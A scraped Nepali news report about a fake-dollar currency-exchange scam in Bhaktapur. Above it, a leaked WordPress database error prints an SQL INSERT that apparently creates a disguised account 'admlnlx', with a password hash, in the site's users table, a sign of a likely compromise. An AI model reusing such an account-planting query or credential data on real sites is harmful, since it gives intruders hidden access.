WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B67z4/teKwmEAaSPUejoJqbmDQxgbm0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 20:33:27', '', 'admlnlx', 'admlnlx')
भक्तपुर, माघ ३-
भक्तपुरको चागुँनारायण नगरपालिका–५ गेलाल गाउँबाट अमेरिकी डलर साट्ने बाहनामा रु १० लाख ठगी गरेर एक व्यक्ति फरार भएका छन् ।
गेलाल गाउँको एकान्तस्थानमा १० हजार अमेरिकी डलर १० लाख रुपैयाँमा सटही गर्ने भन्दै ओखलढुङ्गा सिद्दिचरण नगरपालिका–१ स्थायी घर भई हाल काठमाडौँ ३५ पेप्सीकोला बस्ने वर्ष ५० का मेघनाथ दाहालसँग रु १० लाख ठगी गरेको प्रहरीले जानकारी दिएको छ ।
महानगरीय प्रहरी परिसर भक्तपुरका प्रहरी निरीक्षक दिलबहादर सुवेदीका अनुसार नाम, वतन खुल्न नसकेको मङ्गोलियन अनुहारका ती व्यक्तिले नक्कली डलर दिएर दाहालसँग नेपाली रकम लिएर फरार भएका छन् ।- रासस